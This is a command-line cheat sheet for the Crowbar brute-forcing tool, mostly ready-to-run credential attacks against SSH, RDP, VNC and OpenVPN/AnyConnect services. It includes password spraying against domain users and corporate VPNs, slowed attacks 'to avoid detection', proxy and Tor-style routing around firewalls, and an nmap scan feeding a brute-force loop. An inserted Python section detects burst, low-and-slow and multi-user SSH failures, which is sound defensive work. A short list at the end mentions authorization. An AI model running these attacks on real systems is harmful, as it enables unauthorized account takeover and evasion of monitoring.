Crowbar
Crowbar is a lightweight brute-forcing tool designed for testing SSH, RDP, VPN (OpenVPN, Cisco AnyConnect), and other remote access services, with SOCKS and HTTP proxy support.
Installation
Linux/Ubuntu
# Clone repository
git clone https://github.com/jakethebeard/crowbar.git
cd crowbar
# Install dependencies
pip3 install -r requirements.txt
# or
pip3 install paramiko pycurl
# Make executable
chmod +x crowbar.py
sudo ln -s $(pwd)/crowbar.py /usr/local/bin/crowbar
macOS
# Install via Homebrew
brew tap homebrew-cask && brew install crowbar
# Or from source
git clone https://github.com/jakethebeard/crowbar.git
pip3 install -r requirements.txt
Basic Syntax
# General format
python3 crowbar.py -b <service> -s <target> -u <username> -C <password_file> [-n <threads>] [-t <timeout>]
# Service types available
python3 crowbar.py -h
Supported Services
| Service | Flag | Description |
|---|---|---|
| SSH | ssh | SSH authentication |
| RDP | rdp | Remote Desktop Protocol |
| VNC | vnc | Virtual Network Computing |
| OpenVPN | openvpn | OpenVPN authentication |
| Cisco AnyConnect | openvpn | Cisco VPN client |
| Keyboard-Interactive | ssh | SSH with keyboard-interactive auth |
Command-Line Options
| Option | Description |
|---|---|
| -b, --service <SERVICE> | Service type (ssh, rdp, vnc, openvpn) |
| -s, --single-target <IP> | Target IP address |
| -u, --username <USER> | Single username |
| -U, --username-file <FILE> | Username list file |
| -C, --password-file <FILE> | Password list file (required) |
| -n, --threads <NUM> | Number of threads |
| -t, --timeout <SEC> | Connection timeout |
| -p, --port <PORT> | Custom port |
| -k, --key-file <FILE> | SSH key for authentication |
| -m, --mode <MODE> | Authentication mode |
| --proxy <PROXY> | Proxy settings (SOCKS5, HTTP) |
| -x, --ignore | Ignore specific errors |
SSH Brute Force
Basic SSH Attack
# Simple SSH brute force
python3 crowbar.py -b ssh -s 192.168.1.100 -u admin -C passwords.txt
# With multiple threads
python3 crowbar.py -b ssh -s target.com -u root -C wordlist.txt -n 10
# Custom port
python3 crowbar.py -b ssh -s target.com -p 2222 -u admin -C pass.txt
SSH Key-Based Authentication
# Test SSH key passphrase
python3 crowbar.py -b ssh -s target.com -u admin -k id_rsa -C wordlist.txt
# SSH key with custom port
python3 crowbar.py -b ssh -s 10.0.0.50 -p 22 -u ubuntu -k ~/.ssh/id_rsa -C passphrases.txt
Username Enumeration
# Multiple usernames and passwords
python3 crowbar.py -b ssh -s target.com -U users.txt -C passwords.txt -n 5
# Targeting specific user list
python3 crowbar.py -b ssh -s 192.168.1.0/24 -U admin_accounts.txt -C wordlist.txt
RDP Brute Force
Remote Desktop Services
# Basic RDP credential testing
python3 crowbar.py -b rdp -s 192.168.1.100 -u administrator -C passwords.txt
# Multiple threads for speed
python3 crowbar.py -b rdp -s rdp.internal -u admin -C wordlist.txt -n 15 -t 30
# Multiple targets
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > rdp_hosts.txt
for host in $(cat rdp_hosts.txt); do
  python3 crowbar.py -b rdp -s "$host" -u administrator -C passwords.txt -n 5
done
Domain-Based RDP
# Domain credentials
python3 crowbar.py -b rdp -s dc.corp.local -u DOMAIN\\administrator -C pass.txt
# Service account testing
python3 crowbar.py -b rdp -s app-server.internal -U service_accounts.txt -C passwords.txt
VNC Brute Force
# VNC server testing
python3 crowbar.py -b vnc -s 192.168.1.100 -u '' -C passwords.txt
# VNC with custom port
python3 crowbar.py -b vnc -s target.com -p 5900 -C wordlist.txt -n 8
# VNC key file
python3 crowbar.py -b vnc -s 10.0.0.50 -k vnc_key -C passphrases.txt
VPN Brute Force
OpenVPN Authentication
# OpenVPN credentials
python3 crowbar.py -b openvpn -s vpn.example.com -u admin -C passwords.txt
# Custom OpenVPN port
python3 crowbar.py -b openvpn -s vpn.internal -p 443 -u vpn_user -C wordlist.txt
# Multiple OpenVPN targets
python3 crowbar.py -b openvpn -s file:vpn_hosts.txt -u admin -C passwords.txt
Cisco AnyConnect
# Cisco AnyConnect SSL VPN
python3 crowbar.py -b openvpn -s vpn.cisco.com -u domain\\user -C pass.txt
# AnyConnect with timeout
python3 crowbar.py -b openvpn -s cisco-vpn.corp.local -u admin -C passwords.txt -t 15
Advanced Techniques
Proxy Support
# SOCKS5 proxy
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt --proxy socks5://127.0.0.1:1080
# HTTP proxy for VPN
python3 crowbar.py -b openvpn -s vpn.example.com -u admin -C wordlist.txt --proxy http://proxy:8080
# Through SSH tunnel
# (Create tunnel first)
ssh -D 1080 bastion.com
python3 crowbar.py -b ssh -s internal.target -u user -C pass.txt --proxy socks5://127.0.0.1:1080
Timeout and Rate Control
# Short timeout for quick failures
python3 crowbar.py -b ssh -s target.com -u admin -C wordlist.txt -t 5
# Slow brute force to avoid detection
python3 crowbar.py -b ssh -s target.com -u admin -C passwords.txt -n 2 -t 20
# Staged attack
# Test small wordlist first
python3 crowbar.py -b ssh -s target.com -u admin -C top-10.txt
# If successful, move to larger wordlist
python3 crowbar.py -b ssh -s target.com -u admin -C full-wordlist.txt
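From the defender's side, lowering the thread count and raising the timeout only spreads the same failed logins over a longer period, so detection needs a long window as well as a short one. The following is an added example (not part of the original cheat sheet or of the Crowbar project) that parses sshd "Failed password" lines and tags each source address; the log lines, thresholds and tag names are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
FAILED = re.compile(  # sshd failure line in classic syslog format
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port", re.M)

def parse_failures(text, year=2025):
    """Yield (timestamp, source_ip, user); syslog omits the year, so it is assumed."""
    for m in FAILED.finditer(text):
        yield datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["ip"], m["user"]

def max_in_window(times, seconds):
    """Largest number of events inside any sliding window of `seconds`."""
    best = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > seconds:
            start += 1
        best = max(best, end - start + 1)
    return best

def detect(text, burst=5, burst_s=60, slow=8, slow_s=3600, spray_users=4):
    """Return {source_ip: set of tags}; the thresholds are illustrative."""
    by_ip = defaultdict(list)
    for ts, ip, user in parse_failures(text):
        by_ip[ip].append((ts, user))
    findings = {}
    for ip, events in by_ip.items():
        times = sorted(ts for ts, _ in events)
        tags = set()
        if max_in_window(times, burst_s) >= burst:
            tags.add("burst")         # many failures within a minute
        elif max_in_window(times, slow_s) >= slow:
            tags.add("low-and-slow")  # same volume, spread over an hour
        if len({user for _, user in events}) >= spray_users:
            tags.add("multi-user")    # one source cycling through usernames
        if tags:
            findings[ip] = tags
    return findings

# Constructed sample log: documentation address ranges, made-up host and users.
def _fail(offset_s, user, ip):
    ts = datetime(2025, 3, 30, 10, 0, 0) + timedelta(seconds=offset_s)
    return f"{ts:%b %d %H:%M:%S} host1 sshd[4242]: Failed password for {user} from {ip} port 50000 ssh2"
SPRAY = ("jsmith", "deploy", "invalid user oracle", "invalid user test")
SAMPLE_LOG = "\n".join([_fail(2 * i, "root", "203.0.113.10") for i in range(6)]
    + [_fail(300 * i, "admin", "203.0.113.20") for i in range(9)]
    + [_fail(600 * i, u, "203.0.113.30") for i, u in enumerate(SPRAY)]
    + [_fail(30 * i, "alice", "198.51.100.5") for i in range(2)])
```

Calling `detect(SAMPLE_LOG)` tags the first three sources and leaves the two mistyped logins from 198.51.100.5 unflagged.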
Credential Testing Workflow
# 1. Create targeted wordlist
cat > credentials.txt << EOF
password123
admin
welcome
letmein
P@ssw0rd
EOF
# 2. Test SSH
python3 crowbar.py -b ssh -s 10.0.0.1 -u admin -C credentials.txt -n 5
# 3. Test RDP
python3 crowbar.py -b rdp -s 10.0.0.2 -u administrator -C credentials.txt -n 8
# 4. Test VPN
python3 crowbar.py -b openvpn -s vpn.internal -u user -C credentials.txt -n 3
# 5. Document findings
echo "SSH: $(python3 crowbar.py -b ssh -s 10.0.0.1 -u admin -C credentials.txt)" >> findings.txt
Wordlist Management
Create Effective Wordlists
# Common SSH passwords
echo -e "password\nadmin123\nroot\nwelcome\n123456" > ssh_passwords.txt
# RDP defaults
echo -e "Password123!\nAdmin@123\nWelcome1" > rdp_defaults.txt
# VPN accounts
echo -e "vpn_user\nvpnadmin\nvpnaccount" > vpn_users.txt
# Take the first 100 entries of rockyou.txt
head -n 100 /usr/share/wordlists/rockyou.txt > top-100.txt
# Download SecLists
git clone https://github.com/danielmiessler/SecLists.git
cp SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt common.txt
Real-World Examples
Internal Network Assessment
# Find and test all SSH services
nmap -p 22 --open 192.168.0.0/24 -oG ssh_hosts.txt
grep "Host:" ssh_hosts.txt | awk '{print $2}' > ssh_targets.txt
# Brute force discovered SSH
for target in $(cat ssh_targets.txt); do
  python3 crowbar.py -b ssh -s "$target" -U users.txt -C passwords.txt -n 5
done
Multi-Service Testing
# Test discovered RDP service
python3 crowbar.py -b rdp -s domain-controller.local \
  -U domain_users.txt \
  -C spraying_passwords.txt \
  -n 10 \
  -t 15
# Test OpenVPN access
python3 crowbar.py -b openvpn -s corporate-vpn.com \
  -U employee_list.txt \
  -C temporal_passwords.txt \
  -n 5 \
  --proxy socks5://127.0.0.1:9050
Troubleshooting
Common Issues
Connection timeouts
# Increase timeout
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt -t 30
# Reduce threads (too many causes timeouts)
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt -n 3
Module not found
# Install missing dependencies
pip3 install paramiko pycurl python-nmap
# Verify installation
python3 crowbar.py -h
Firewall blocking
# Use proxy
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt --proxy socks5://proxy:1080
# Increase timeout to allow blocked packets
python3 crowbar.py -b ssh -s target.com -u admin -C pass.txt -t 45
Best Practices
- Obtain explicit written authorization before testing
- Use appropriate thread counts (3-5 for stealth, 10-15 for lab)
- Implement rate limiting to avoid account lockouts
- Test with minimal wordlists first
- Monitor for IDS/IPS alerts
- Document all attempts and timestamps
- Use unique job identifiers for tracking
- Respect firewall rules and security controls
- Verify credentials before exploitation
- Remove test accounts after assessment
- Follow responsible disclosure procedures
Last updated: 2025-03-30